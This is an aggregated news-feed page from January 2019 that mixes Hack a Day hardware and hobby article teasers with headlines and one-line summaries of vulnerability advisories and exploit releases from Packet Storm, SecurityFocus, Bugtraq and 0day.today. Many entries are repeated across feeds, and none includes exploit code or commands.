I recently came across the most peculiar way to make a color CRT monitor. More than a few oscilloscopes have found their way on to my bench over the years, but I was particularly struck with a find from eBay. A quick look at the display reveals something a little alien. The sharpness is fantastic: each pixel is a perfect, uniform-colored little dot, a feat unequaled even by today’s best LCDs. The designers seem to have chosen a somewhat odd set of pastels for the UI though, and if you move your head just right, you can catch flashes of …read more

Tags: engineering

6:56
Cook Calls For Laws To Tackle Shadow Economy Of Data Firms
» ‎ Packet Storm Security Headlines

Cook Calls For Laws To Tackle Shadow Economy Of Data Firms
Tags: headlinegovernmentprivacydata lossfraudapplefacebook
6:56
Monster 773 Million-Record Password Breach List Contains Plaintext Passwords
» ‎ Packet Storm Security Headlines

Monster 773 Million-Record Password Breach List Contains Plaintext Passwords
Tags: headlinehackerprivacydata losspasswordidentity theft
6:56
South Korea Had Advanced Weapons Servers Hacked
» ‎ Packet Storm Security Headlines

South Korea Had Advanced Weapons Servers Hacked
Tags: headlinegovernmentcyberwarkorea
6:55
Oklahoma Gov Data Leak Exposes FBI Investigation Records
» ‎ Packet Storm Security Headlines

Oklahoma Gov Data Leak Exposes FBI Investigation Records
Tags: headlinegovernmentprivacyusadata lossfbi
6:55
Facebook Tackles Russians Making Fake News Stories
» ‎ Packet Storm Security Headlines

Facebook Tackles Russians Making Fake News Stories
Tags: headlinegovernmentusarussiafraudcyberwarfacebook
6:55
Shareholders Demand Amazon End Facial Recognition Sales To Government
» ‎ Packet Storm Security Headlines

Shareholders Demand Amazon End Facial Recognition Sales To Government
Tags: headlinegovernmentprivacyusaamazon

4:00
A Compiler in Plain Text Also Plays Music
» ‎ Hack a Day

As a layperson reading about some branches of mathematics, it often seems like mathematicians are just people who really like to create and solve puzzles. And, knowing that computer science shares a lot of its fundamentals with mathematics, we can assume that most computer scientists are also puzzle-solvers as well. This latest project from [tom7] shows off his puzzle creating and solving skills with a readable file which is also a paper, which is also a compiler for C programs, which can also play music.

[tom7] started off with the instruction set for the Intel 8086 processor. Of the instructions …read more

Tags: computer hacks
1:00
PostmarketOS Turns 600 Days Old
» ‎ Hack a Day

PostmarketOS began work on a real Linux distribution for Android phones just over 600 days ago. They recently blogged about the state of the project and ensured us that the project is definitely not dead.

PostmarketOS’ overarching goal remains a 10 year life-cycle for smartphones. We previously covered the project on Hackaday to give an introduction. Today, we’ll concern ourselves with the progress the PostmarketOS team has made.

The team admits that they’re stuck in the proof-of-concept phase, and need to break out of it. This has required foundational changes to the operating system to enable development across a wide …read more

Tags: cellphone hacks

0:00
Vuln: OpenSSL CVE-2018-0739 Denial of Service Vulnerability
» ‎ SecurityFocus Vulnerabilities

OpenSSL CVE-2018-0739 Denial of Service Vulnerability
Tags:
0:00
Vuln: Ghostscript 'shading_param' Remote Code Execution Vulnerability
» ‎ SecurityFocus Vulnerabilities

Ghostscript 'shading_param' Remote Code Execution Vulnerability
Tags:
0:00
Vuln: Wireshark Multiple Denial of Service Vulnerabilities
» ‎ SecurityFocus Vulnerabilities

Wireshark Multiple Denial of Service Vulnerabilities
Tags:
0:00
Vuln: Memcached Multiple Integer Overflow Vulnerabilities
» ‎ SecurityFocus Vulnerabilities

Memcached Multiple Integer Overflow Vulnerabilities
Tags:
0:00
Vuln: OpenSSL CVE-2018-5407 Side Channel Attack Information Disclosure Vulnerability
» ‎ SecurityFocus Vulnerabilities

OpenSSL CVE-2018-5407 Side Channel Attack Information Disclosure Vulnerability
Tags:
0:00
Vuln: OpenSSL CVE-2018-0734 Side Channel Attack Information Disclosure Vulnerability
» ‎ SecurityFocus Vulnerabilities

OpenSSL CVE-2018-0734 Side Channel Attack Information Disclosure Vulnerability
Tags:
0:00
Vuln: Poppler CVE-2017-14517 Denial of Service Vulnerability
» ‎ SecurityFocus Vulnerabilities

Poppler CVE-2017-14517 Denial of Service Vulnerability
Tags:
0:00
Vuln: NTP CVE-2018-12327 Stack Buffer Overflow Vulnerability
» ‎ SecurityFocus Vulnerabilities

NTP CVE-2018-12327 Stack Buffer Overflow Vulnerability
Tags:

January 16, 2019
22:00
Breakfast Bot Does Eggs To Perfection
» ‎ Hack a Day

Breakfast is a meal fraught with paradoxes. It’s important to start the day with a hearty meal full of energy and nutrition, but it’s also difficult to cook when you’re still bleary-eyed and half asleep. As with many problems in life, automation is the answer. [James Bruton] has the rig that will boil your egg and get your day off to a good start.

The basic apparatus uses a thermostatically controlled hotplate to heat a pot of water. [James] then employs an encoder-controlled linear actuator from a previous project to raise and lower a mesh colander into the pot, carrying …read more

Tags: cooking hacks
19:00
RSA Encryption Cracked Easily (Sometimes)
» ‎ Hack a Day

A large chunk of the global economy now rests on public key cryptography. We generally agree that with long enough keys, it is infeasible to crack things encoded that way. Until such time as it isn’t, that is. Researchers published a paper a few years ago where they cracked a large number of keys in a very short amount of time. It doesn’t work on any key, as you’ll see in a bit, but here’s the interesting part: they used an undescribed algorithm to crack the codes in a very short amount of time on a single-core computer. This piqued …read more

Tags: security hacks

18:42
Blueimp jQuery File Upload 9.22.0 Arbitrary File Upload
» ‎ Packet Storm Security Exploits

Blueimp jQuery File Upload versions 9.22.0 and below suffer from a remote file upload vulnerability.
Tags:

18:42
Blueimp jQuery File Upload 9.22.0 Arbitrary File Upload
» ‎ Packet Storm Security Recent Files

Blueimp jQuery File Upload versions 9.22.0 and below suffer from a remote file upload vulnerability.
Tags:

18:42
Blueimp jQuery File Upload 9.22.0 Arbitrary File Upload
» ‎ Packet Storm Security Misc. Files

Blueimp jQuery File Upload versions 9.22.0 and below suffer from a remote file upload vulnerability.
Tags:

18:28
ShoreTel / Mitel Connect ONSITE ST14.2 Remote Code Execution
» ‎ Packet Storm Security Exploits

ShoreTel / Mitel Connect ONSITE ST14.2 suffers from a remote code execution vulnerability.
Tags:

18:28
ShoreTel / Mitel Connect ONSITE ST14.2 Remote Code Execution
» ‎ Packet Storm Security Recent Files

ShoreTel / Mitel Connect ONSITE ST14.2 suffers from a remote code execution vulnerability.
Tags:

18:28
ShoreTel / Mitel Connect ONSITE ST14.2 Remote Code Execution
» ‎ Packet Storm Security Misc. Files

ShoreTel / Mitel Connect ONSITE ST14.2 suffers from a remote code execution vulnerability.
Tags:

18:26
doorGets CMS 7.0 File Download
» ‎ Packet Storm Security Exploits

doorGets CMS version 7.0 suffers from a file download vulnerability.
Tags:

18:26
doorGets CMS 7.0 File Download
» ‎ Packet Storm Security Recent Files

doorGets CMS version 7.0 suffers from a file download vulnerability.
Tags:

18:26
doorGets CMS 7.0 File Download
» ‎ Packet Storm Security Misc. Files

doorGets CMS version 7.0 suffers from a file download vulnerability.
Tags:

18:22
Windows Debugging 101
» ‎ Packet Storm Security Recent Files

Whitepaper called Windows Debugging 101. Written in Portuguese.
Tags:

18:22
Windows Debugging 101
» ‎ Packet Storm Security Misc. Files

Whitepaper called Windows Debugging 101. Written in Portuguese.
Tags:

18:20
[SYSS-2018-041] Mozilla Firefox - Information Exposure
» ‎ Bugtraq

Posted by vladimir . bostanov on Jan 16
Advisory ID: SYSS-2018-041
Product: Firefox
Manufacturer: Mozilla
Affected Versions: <= 64
Tested Versions: 61, 62, 63, 64
Vulnerability Type: Information Exposure (CWE-200)
Risk Level: Medium
Solution Status: Open
Manufacturer Notification: 2018-07-19
Solution Date: -
Public Disclosure: 2019-01-16
CVE Reference: Not yet assigned
Author of Advisory: Dr. Vladimir Bostanov, SySS GmbH...

Tags:
18:17
[SECURITY] [DSA 4367-2] systemd regression update
» ‎ Bugtraq

Posted by Salvatore Bonaccorso on Jan 16
-------------------------------------------------------------------------
Debian Security Advisory DSA-4367-2 security () debian org
https://www.debian.org/security/ Salvatore Bonaccorso
January 15, 2019 https://www.debian.org/security/faq
-------------------------------------------------------------------------

Package : systemd

The Qualys Research Labs reported that the...

Tags:
18:13
CVE-2018-13798 Siemens - SICAM A8000 Series Webinterface XXE DoS
» ‎ Bugtraq

Posted by Advisories on Jan 16
#############################################################
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
#############################################################
#
# Product: SICAM A8000 Series
# Vendor: Siemens
# CSNC ID: CSNC-2019-002
# CVE ID: CVE-2018-13798
# Subject: SICAM Webinterface XXE DoS
# Risk: Medium (CVSS 3.0 Base Score: 5.3)
# CVSS 3.0:...

Tags:

16:28
#0daytoday #blueman - set_dhcp_handler D-Bus Privilege Escalation Exploit [remote #exploits #0day #Exploit]
» ‎ 0day.today (was: 1337day, Inj3ct0r, 1337db)

#0daytoday #blueman - set_dhcp_handler D-Bus Privilege Escalation Exploit [remote #exploits #0day #Exploit]
Tags:
16:28
#0daytoday #Microsoft Windows 10 - XmlDocument Insecure Sharing Privilege Escalation Exploit [#0day #Exploit]
» ‎ 0day.today (was: 1337day, Inj3ct0r, 1337db)

#0daytoday #Microsoft Windows 10 - XmlDocument Insecure Sharing Privilege Escalation Exploit [#0day #Exploit]
Tags:
16:27
#0daytoday #Microsoft Windows 10 - RestrictedErrorInfo Unmarshal Section Handle Use-After-Free Expl [#0day #Exploit]
» ‎ 0day.today (was: 1337day, Inj3ct0r, 1337db)

#0daytoday #Microsoft Windows 10 - RestrictedErrorInfo Unmarshal Section Handle Use-After-Free Expl [#0day #Exploit]
Tags:

16:18
Ubuntu Security Notice USN-3861-2
» ‎ Packet Storm Security Advisories

Ubuntu Security Notice 3861-2 - USN-3861-1 fixed a vulnerability in PolicyKit. This update provides the corresponding update for Ubuntu 12.04 ESM. It was discovered that PolicyKit incorrectly handled certain large user UIDs. A local attacker with a large UID could possibly use this issue to perform privileged actions. Various other issues were also addressed.
Tags:

16:18
Ubuntu Security Notice USN-3861-2
» ‎ Packet Storm Security Recent Files

Ubuntu Security Notice 3861-2 - USN-3861-1 fixed a vulnerability in PolicyKit. This update provides the corresponding update for Ubuntu 12.04 ESM. It was discovered that PolicyKit incorrectly handled certain large user UIDs. A local attacker with a large UID could possibly use this issue to perform privileged actions. Various other issues were also addressed.
Tags:

16:18
Ubuntu Security Notice USN-3861-2
» ‎ Packet Storm Security Misc. Files

Ubuntu Security Notice 3861-2 - USN-3861-1 fixed a vulnerability in PolicyKit. This update provides the corresponding update for Ubuntu 12.04 ESM. It was discovered that PolicyKit incorrectly handled certain large user UIDs. A local attacker with a large UID could possibly use this issue to perform privileged actions. Various other issues were also addressed.
Tags:

16:17
Red Hat Security Advisory 2019-0085-01
» ‎ Packet Storm Security Advisories

Red Hat Security Advisory 2019-0085-01 - The pyOpenSSL packages provide a high-level wrapper around a subset of the OpenSSL library for the Python programming language. Issues addressed include an use-after-free vulnerability.
Tags:

16:17
Red Hat Security Advisory 2019-0085-01
» ‎ Packet Storm Security Recent Files

Red Hat Security Advisory 2019-0085-01 - The pyOpenSSL packages provide a high-level wrapper around a subset of the OpenSSL library for the Python programming language. Issues addressed include an use-after-free vulnerability.
Tags:

16:17
Red Hat Security Advisory 2019-0085-01
» ‎ Packet Storm Security Misc. Files

Red Hat Security Advisory 2019-0085-01 - The pyOpenSSL packages provide a high-level wrapper around a subset of the OpenSSL library for the Python programming language. Issues addressed include an use-after-free vulnerability.
Tags:

16:14
Red Hat Security Advisory 2019-0081-01
» ‎ Packet Storm Security Advisories

Red Hat Security Advisory 2019-0081-01 - Open vSwitch provides standard network bridging functions and support for the OpenFlow protocol for remote per-flow control of traffic. Issues addressed include buffer over-read and assertion failure vulnerabilities.
Tags:

16:14
Red Hat Security Advisory 2019-0081-01
» ‎ Packet Storm Security Recent Files

Red Hat Security Advisory 2019-0081-01 - Open vSwitch provides standard network bridging functions and support for the OpenFlow protocol for remote per-flow control of traffic. Issues addressed include buffer over-read and assertion failure vulnerabilities.
Tags:

16:14
Red Hat Security Advisory 2019-0081-01
» ‎ Packet Storm Security Misc. Files

Red Hat Security Advisory 2019-0081-01 - Open vSwitch provides standard network bridging functions and support for the OpenFlow protocol for remote per-flow control of traffic. Issues addressed include buffer over-read and assertion failure vulnerabilities.
Tags:

16:13
Red Hat Security Advisory 2019-0082-01
» ‎ Packet Storm Security Advisories

Red Hat Security Advisory 2019-0082-01 - Django is a high-level Python Web framework that encourages rapid development and a clean, pragmatic design. It focuses on automating as much as possible and adhering to the DRY principle. Issues addressed include a regular expression issue.
Tags:

16:13
Red Hat Security Advisory 2019-0082-01
» ‎ Packet Storm Security Recent Files

Red Hat Security Advisory 2019-0082-01 - Django is a high-level Python Web framework that encourages rapid development and a clean, pragmatic design. It focuses on automating as much as possible and adhering to the DRY principle. Issues addressed include a regular expression issue.
Tags:

16:13
Red Hat Security Advisory 2019-0082-01
» ‎ Packet Storm Security Misc. Files

Red Hat Security Advisory 2019-0082-01 - Django is a high-level Python Web framework that encourages rapid development and a clean, pragmatic design. It focuses on automating as much as possible and adhering to the DRY principle. Issues addressed include a regular expression issue.
Tags:

16:13
Red Hat Security Advisory 2019-0094-01
» ‎ Packet Storm Security Advisories

Red Hat Security Advisory 2019-0094-01 - Redis is an advanced key-value store. It is often referred to as a data-structure server since keys can contain strings, hashes, lists, sets, and sorted sets. For performance, Redis works with an in-memory data set. You can persist it either by dumping the data set to disk every once in a while, or by appending each command to a log. Issues addressed include a code execution vulnerability.
Tags:

16:13
Red Hat Security Advisory 2019-0094-01
» ‎ Packet Storm Security Recent Files

Red Hat Security Advisory 2019-0094-01 - Redis is an advanced key-value store. It is often referred to as a data-structure server since keys can contain strings, hashes, lists, sets, and sorted sets. For performance, Redis works with an in-memory data set. You can persist it either by dumping the data set to disk every once in a while, or by appending each command to a log. Issues addressed include a code execution vulnerability.
Tags:

16:13
Red Hat Security Advisory 2019-0094-01
» ‎ Packet Storm Security Misc. Files

Red Hat Security Advisory 2019-0094-01 - Redis is an advanced key-value store. It is often referred to as a data-structure server since keys can contain strings, hashes, lists, sets, and sorted sets. For performance, Redis works with an in-memory data set. You can persist it either by dumping the data set to disk every once in a while, or by appending each command to a log. Issues addressed include a code execution vulnerability.
Tags:

16:03
Red Hat Security Advisory 2019-0053-01
» ‎ Packet Storm Security Advisories

Red Hat Security Advisory 2019-0053-01 - Open vSwitch provides standard network bridging functions and support for the OpenFlow protocol for remote per-flow control of traffic. Issues addressed include buffer over-read and assertion failure vulnerabilities.
Tags:

16:03
Red Hat Security Advisory 2019-0053-01
» ‎ Packet Storm Security Recent Files

Red Hat Security Advisory 2019-0053-01 - Open vSwitch provides standard network bridging functions and support for the OpenFlow protocol for remote per-flow control of traffic. Issues addressed include buffer over-read and assertion failure vulnerabilities.
Tags:

16:03
Red Hat Security Advisory 2019-0053-01
» ‎ Packet Storm Security Misc. Files

Red Hat Security Advisory 2019-0053-01 - Open vSwitch provides standard network bridging functions and support for the OpenFlow protocol for remote per-flow control of traffic. Issues addressed include buffer over-read and assertion failure vulnerabilities.
Tags:

16:02
Red Hat Security Advisory 2019-0054-01
» ‎ Packet Storm Security Advisories

Red Hat Security Advisory 2019-0054-01 - Ansible is a simple model-driven configuration management, multi-node deployment, and remote-task execution system. Ansible works over SSH and does not require any software or daemons to be installed on remote nodes. Extension modules can be written in any language and are transferred to managed machines automatically. Issues addressed include code execution and information leakage vulnerabilities.
Tags:

16:02
Red Hat Security Advisory 2019-0054-01
» ‎ Packet Storm Security Recent Files

Red Hat Security Advisory 2019-0054-01 - Ansible is a simple model-driven configuration management, multi-node deployment, and remote-task execution system. Ansible works over SSH and does not require any software or daemons to be installed on remote nodes. Extension modules can be written in any language and are transferred to managed machines automatically. Issues addressed include code execution and information leakage vulnerabilities.
Tags:

16:02
Red Hat Security Advisory 2019-0054-01
» ‎ Packet Storm Security Misc. Files

Red Hat Security Advisory 2019-0054-01 - Ansible is a simple model-driven configuration management, multi-node deployment, and remote-task execution system. Ansible works over SSH and does not require any software or daemons to be installed on remote nodes. Extension modules can be written in any language and are transferred to managed machines automatically. Issues addressed include code execution and information leakage vulnerabilities.
Tags:

16:01
Red Hat Security Advisory 2019-0051-01
» ‎ Packet Storm Security Advisories

Red Hat Security Advisory 2019-0051-01 - Django is a high-level Python Web framework that encourages rapid development and a clean, pragmatic design. It focuses on automating as much as possible and adhering to the DRY principle. Issues addressed include a regular expression issue.
Tags:

16:01
Red Hat Security Advisory 2019-0051-01
» ‎ Packet Storm Security Recent Files

Red Hat Security Advisory 2019-0051-01 - Django is a high-level Python Web framework that encourages rapid development and a clean, pragmatic design. It focuses on automating as much as possible and adhering to the DRY principle. Issues addressed include a regular expression issue.
Tags:

16:01
Red Hat Security Advisory 2019-0051-01
» ‎ Packet Storm Security Misc. Files

Red Hat Security Advisory 2019-0051-01 - Django is a high-level Python Web framework that encourages rapid development and a clean, pragmatic design. It focuses on automating as much as possible and adhering to the DRY principle. Issues addressed include a regular expression issue.
Tags:

16:00
Red Hat Security Advisory 2019-0052-01
» ‎ Packet Storm Security Advisories

Red Hat Security Advisory 2019-0052-01 - Redis is an advanced key-value store. It is often referred to as a data-structure server since keys can contain strings, hashes, lists, sets, and sorted sets. For performance, Redis works with an in-memory data set. You can persist it either by dumping the data set to disk every once in a while, or by appending each command to a log. Issues addressed include a code execution vulnerability.
Tags:

16:00
Red Hat Security Advisory 2019-0052-01
» ‎ Packet Storm Security Recent Files

Red Hat Security Advisory 2019-0052-01 - Redis is an advanced key-value store. It is often referred to as a data-structure server since keys can contain strings, hashes, lists, sets, and sorted sets. For performance, Redis works with an in-memory data set. You can persist it either by dumping the data set to disk every once in a while, or by appending each command to a log. Issues addressed include a code execution vulnerability.
Tags:

16:00
Red Hat Security Advisory 2019-0052-01
» ‎ Packet Storm Security Misc. Files

Red Hat Security Advisory 2019-0052-01 - Redis is an advanced key-value store. It is often referred to as a data-structure server since keys can contain strings, hashes, lists, sets, and sorted sets. For performance, Redis works with an in-memory data set. You can persist it either by dumping the data set to disk every once in a while, or by appending each command to a log. Issues addressed include a code execution vulnerability.
Tags:

16:00
Ubuntu Security Notice USN-3861-1
» ‎ Packet Storm Security Advisories

Ubuntu Security Notice 3861-1 - It was discovered that PolicyKit incorrectly handled certain large user UIDs. A local attacker with a large UID could possibly use this issue to perform privileged actions.
Tags:

16:00
Ubuntu Security Notice USN-3861-1
» ‎ Packet Storm Security Recent Files

Ubuntu Security Notice 3861-1 - It was discovered that PolicyKit incorrectly handled certain large user UIDs. A local attacker with a large UID could possibly use this issue to perform privileged actions.
Tags:

16:00
Ubuntu Security Notice USN-3861-1
» ‎ Packet Storm Security Misc. Files

Ubuntu Security Notice 3861-1 - It was discovered that PolicyKit incorrectly handled certain large user UIDs. A local attacker with a large UID could possibly use this issue to perform privileged actions.
Tags:

16:00
The Embroidered Computer
» ‎ Hack a Day

By now we’ve all seen ways to manufacture your own PCBs. There are board shops who will do small orders for one-off projects, or you can try something like the toner transfer method if you want to get really adventurous. One thing we haven’t seen is a circuit board that’s stitched together, but that’s exactly what a group of people at a Vienna arts exhibition have done.

The circuit is stitched together on a sheet of fabric using traditional gold embroidery methods for the threads, which function as the circuit’s wires. The relays are made out of magnetic beads, and …read more

Tags: art

15:33
Microsoft Windows .contact Arbitrary Code Execution
» ‎ Packet Storm Security Exploits

This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Windows. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The flaw is due to the processing of ".contact" files node param which takes an expected website value, however if an attacker references an executable file it will run that instead without warning instead of performing expected web navigation. This is dangerous and would be unexpected to an end user.
Tags:

15:33
Microsoft Windows .contact Arbitrary Code Execution
» ‎ Packet Storm Security Recent Files

This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Windows. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The flaw is due to the processing of ".contact" files node param which takes an expected website value, however if an attacker references an executable file it will run that instead without warning instead of performing expected web navigation. This is dangerous and would be unexpected to an end user.
Tags:

15:33
Microsoft Windows .contact Arbitrary Code Execution
» ‎ Packet Storm Security Misc. Files

This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Windows. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The flaw is due to the processing of ".contact" files node param which takes an expected website value, however if an attacker references an executable file it will run that instead without warning instead of performing expected web navigation. This is dangerous and would be unexpected to an end user.
Tags:

15:32
GL-AR300M-Lite 2.2.7 Command Injection / Directory Traversal
» ‎ Packet Storm Security Exploits

GL-AR300M-Lite version 2.27 suffers from command injection, file download, and directory traversal vulnerabilities.
Tags:

15:32
GL-AR300M-Lite 2.2.7 Command Injection / Directory Traversal
» ‎ Packet Storm Security Recent Files

GL-AR300M-Lite version 2.27 suffers from command injection, file download, and directory traversal vulnerabilities.
Tags:

15:32
GL-AR300M-Lite 2.2.7 Command Injection / Directory Traversal
» ‎ Packet Storm Security Misc. Files

GL-AR300M-Lite version 2.27 suffers from command injection, file download, and directory traversal vulnerabilities.
Tags:

13:00
This Monowheel Is Bright Orange, And We Want One
» ‎ Hack a Day

Monowheels are a singular form of transport. Like electric scooters and the Segway, they are remarkably impractical for getting from point A to point B, are expensive to build or buy, and make you look faintly silly as you ride them down the street. However, we’d be hard pressed to find a member of the Hackaday team that wouldn’t at least want a go on one for half an hour. [MakeItExtreme] felt the same way, and built one of their own.

The build starts with a tube bender, used to form 40mm tubing into a continuous circle to form the …read more

Tags: classic hacks

12:32
Roxy Fileman 1.4.5 Arbitrary File Download
» ‎ Packet Storm Security Exploits

Roxy Fileman version 1.4.5 suffers from an arbitrary file download vulnerability.
Tags:

12:32
Roxy Fileman 1.4.5 Arbitrary File Download
» ‎ Packet Storm Security Recent Files

Roxy Fileman version 1.4.5 suffers from an arbitrary file download vulnerability.
Tags:

12:32
Roxy Fileman 1.4.5 Arbitrary File Download
» ‎ Packet Storm Security Misc. Files

Roxy Fileman version 1.4.5 suffers from an arbitrary file download vulnerability.
Tags:

12:22
Coship Wireless Router Unauthenticated Admin Password Reset
» ‎ Packet Storm Security Exploits

Coship Wireless Router versions 4.0.0.48, 4.0.0.40, 5.0.0.54, 5.0.0.55, and 10.0.0.49 suffer from an unauthenticated admin password reset vulnerability.
Tags:
12:22
FortiGate FortiOS LDAP Credential Disclosure
» ‎ Packet Storm Security Exploits

FortiGate FortiOS versions prior to 6.0.3 suffer from an LDAP credential disclosure vulnerability.
Tags:

12:22
FortiGate FortiOS LDAP Credential Disclosure
» ‎ Packet Storm Security Recent Files

FortiGate FortiOS versions prior to 6.0.3 suffer from an LDAP credential disclosure vulnerability.
Tags:
12:22
Coship Wireless Router Unauthenticated Admin Password Reset
» ‎ Packet Storm Security Recent Files

Coship Wireless Router versions 4.0.0.48, 4.0.0.40, 5.0.0.54, 5.0.0.55, and 10.0.0.49 suffer from an unauthenticated admin password reset vulnerability.
Tags:

12:22
FortiGate FortiOS LDAP Credential Disclosure
» ‎ Packet Storm Security Misc. Files

FortiGate FortiOS versions prior to 6.0.3 suffer from an LDAP credential disclosure vulnerability.
Tags:
12:22
Coship Wireless Router Unauthenticated Admin Password Reset
» ‎ Packet Storm Security Misc. Files

Coship Wireless Router versions 4.0.0.48, 4.0.0.40, 5.0.0.54, 5.0.0.55, and 10.0.0.49 suffer from an unauthenticated admin password reset vulnerability.
Tags:

11:30
Brush With The Power Of 3D Printing
» ‎ Hack a Day

When it comes to 3D printing, functional prints are still few and far between. Sure, you can print a mount for anything, a Raspberry Pi case, but there are few prints out there that are truly useful, and even fewer that are useful while taking advantage of the specific capabilities of a 3D printer.

The Bouldering Brush from Turbo SunShine turns this observation on its head. It’s a useful device for getting the grime, sand, and sweat out of handholds while rock climbing, and it’s entirely 3D printed using manufacturing techniques only 3D printers can do.

If you’re thinking you’ve …read more

Tags: printer hacks
10:01
Plastics: Acrylic
» ‎ Hack a Day

If anything ends up on the beds of hobbyist-grade laser cutters more often than birch plywood, it’s probably sheets of acrylic. There’s something strangely satisfying about watching a laser beam trace over a sheet of the crystal-clear stuff, vaporizing a hairs-breadth line while it goes, and (hopefully) leaving a flame-polished cut in its wake.

Acrylic, more properly known as poly(methyl methacrylate) or PMMA, is a wonder material that helped win a war before being developed for peacetime use. It has some interesting chemistry and properties that position it well for use in the home shop as everything from simple enclosures …read more

Tags: hackaday Columns
9:01
New Contest: 3D Printed Gears, Pulleys, and Cams
» ‎ Hack a Day

One of the killer apps of 3D printers is the ability to make custom gears, transmissions, and mechanisms. But there’s a learning curve. If you haven’t 3D printed your own gearbox or automaton, here’s a great reason to take the plunge. This morning Hackaday launched the 3D Printed Gears, Pulleys, and Cams contest, a challenge to make stuff move using 3D-printed mechanisms.

Adding movement to a project brings it to life. Often times we see projects where moving parts are connected directly to a server or other motor, but you can do a lot more interesting things by adding some …read more

Tags: printer hacks
8:30
The Printed Solution To A Handful Of Resistors
» ‎ Hack a Day

Resistors are an odd bunch. Why would you have 1.0 Ω resistors, then a 1.1 Ω resistor, but there’s no resistors in between 4.7 Ω and 5.6 Ω? This is a question that has been asked for decades, but the answer is actually quite simple. Resistors are manufactured according to their tolerance, not their value. By putting twenty four steps on a logarithmic scale, you get values that, when you take into account the tolerance of each resistor, covers all possible values. Need a 5.0 Ω resistor? Take a meter to some 4.7 Ω and 5.6 Ω resistors. You’ll find …read more

Tags: printer hacks

7:25
Microsoft Windows Net-NTLMv2 Reflection DCOM/RPC Privilege Escalation
» ‎ Packet Storm Security Exploits

This Metasploit module utilizes the Net-NTLMv2 reflection between DCOM/RPC to achieve a SYSTEM handle for elevation of privilege. It requires a CLSID string.
Tags:

7:25
Microsoft Windows Net-NTLMv2 Reflection DCOM/RPC Privilege Escalation
» ‎ Packet Storm Security Recent Files

This Metasploit module utilizes the Net-NTLMv2 reflection between DCOM/RPC to achieve a SYSTEM handle for elevation of privilege. It requires a CLSID string.
Tags:

7:25
Microsoft Windows Net-NTLMv2 Reflection DCOM/RPC Privilege Escalation
» ‎ Packet Storm Security Misc. Files

This Metasploit module utilizes the Net-NTLMv2 reflection between DCOM/RPC to achieve a SYSTEM handle for elevation of privilege. It requires a CLSID string.
Tags:

7:19
blueman set_dhcp_handler D-Bus Privilege Escalation
» ‎ Packet Storm Security Exploits

This Metasploit module attempts to gain root privileges by exploiting a Python code injection vulnerability in blueman versions prior to 2.0.3. The org.blueman.Mechanism.EnableNetwork D-Bus interface exposes the set_dhcp_handler function which uses user input in a call to eval, without sanitization, resulting in arbitrary code execution as root. This module has been tested successfully with blueman version 1.23 on Debian 8 Jessie (x64).
Tags:

7:19
blueman set_dhcp_handler D-Bus Privilege Escalation
» ‎ Packet Storm Security Recent Files

This Metasploit module attempts to gain root privileges by exploiting a Python code injection vulnerability in blueman versions prior to 2.0.3. The org.blueman.Mechanism.EnableNetwork D-Bus interface exposes the set_dhcp_handler function which uses user input in a call to eval, without sanitization, resulting in arbitrary code execution as root. This module has been tested successfully with blueman version 1.23 on Debian 8 Jessie (x64).
Tags:

7:19
blueman set_dhcp_handler D-Bus Privilege Escalation
» ‎ Packet Storm Security Misc. Files

This Metasploit module attempts to gain root privileges by exploiting a Python code injection vulnerability in blueman versions prior to 2.0.3. The org.blueman.Mechanism.EnableNetwork D-Bus interface exposes the set_dhcp_handler function which uses user input in a call to eval, without sanitization, resulting in arbitrary code execution as root. This module has been tested successfully with blueman version 1.23 on Debian 8 Jessie (x64).
Tags:

7:14
Microsoft Windows XmlDocument Insecure Sharing Privilege Escalation
» ‎ Packet Storm Security Exploits

A number of Partial Trust Windows Runtime classes expose the XmlDocument class across process boundaries to less privileged callers which in its current form can be used to elevate privileges and escape the Edge Content LPAC sandbox.
Tags:

7:14
Microsoft Windows XmlDocument Insecure Sharing Privilege Escalation
» ‎ Packet Storm Security Recent Files

A number of Partial Trust Windows Runtime classes expose the XmlDocument class across process boundaries to less privileged callers which in its current form can be used to elevate privileges and escape the Edge Content LPAC sandbox.
Tags:

7:14
Microsoft Windows XmlDocument Insecure Sharing Privilege Escalation
» ‎ Packet Storm Security Misc. Files

A number of Partial Trust Windows Runtime classes expose the XmlDocument class across process boundaries to less privileged callers which in its current form can be used to elevate privileges and escape the Edge Content LPAC sandbox.
Tags:

7:13
Microsoft Windows RestrictedErrorInfo Unmarshal Section Handle Use-After-Free
» ‎ Packet Storm Security Exploits

The WinRT RestrictedErrorInfo does not correctly check the validity of a handle to a section object which results in closing an unrelated handle which can lead to an elevation of privilege.
Tags:

7:13
Microsoft Windows RestrictedErrorInfo Unmarshal Section Handle Use-After-Free
» ‎ Packet Storm Security Recent Files

The WinRT RestrictedErrorInfo does not correctly check the validity of a handle to a section object which results in closing an unrelated handle which can lead to an elevation of privilege.
Tags:

7:13
Microsoft Windows RestrictedErrorInfo Unmarshal Section Handle Use-After-Free
» ‎ Packet Storm Security Misc. Files

The WinRT RestrictedErrorInfo does not correctly check the validity of a handle to a section object which results in closing an unrelated handle which can lead to an elevation of privilege.
Tags:

7:09
Streamworks Job Scheduler Release 7 Authentication Weakness
» ‎ Packet Storm Security Exploits

Streamworks Job Scheduler Release 7 has all agents using the same X.509 certificates and keys issued by the vendor for authentication. The processing server component does not check received messages properly for authenticity. Agents installed on servers do not check received messages properly for authenticity. Agents and processing servers are vulnerable to the TLS Heartbleed attack.
Tags:

7:09
Streamworks Job Scheduler Release 7 Authentication Weakness
» ‎ Packet Storm Security Recent Files

Streamworks Job Scheduler Release 7 has all agents using the same X.509 certificates and keys issued by the vendor for authentication. The processing server component does not check received messages properly for authenticity. Agents installed on servers do not check received messages properly for authenticity. Agents and processing servers are vulnerable to the TLS Heartbleed attack.
Tags:

7:09
Streamworks Job Scheduler Release 7 Authentication Weakness
» ‎ Packet Storm Security Misc. Files

Streamworks Job Scheduler Release 7 has all agents using the same X.509 certificates and keys issued by the vendor for authentication. The processing server component does not check received messages properly for authenticity. Agents installed on servers do not check received messages properly for authenticity. Agents and processing servers are vulnerable to the TLS Heartbleed attack.
Tags:

7:07
EuskalHack Security Congress IV Call For Papers
» ‎ Packet Storm Security Recent Files

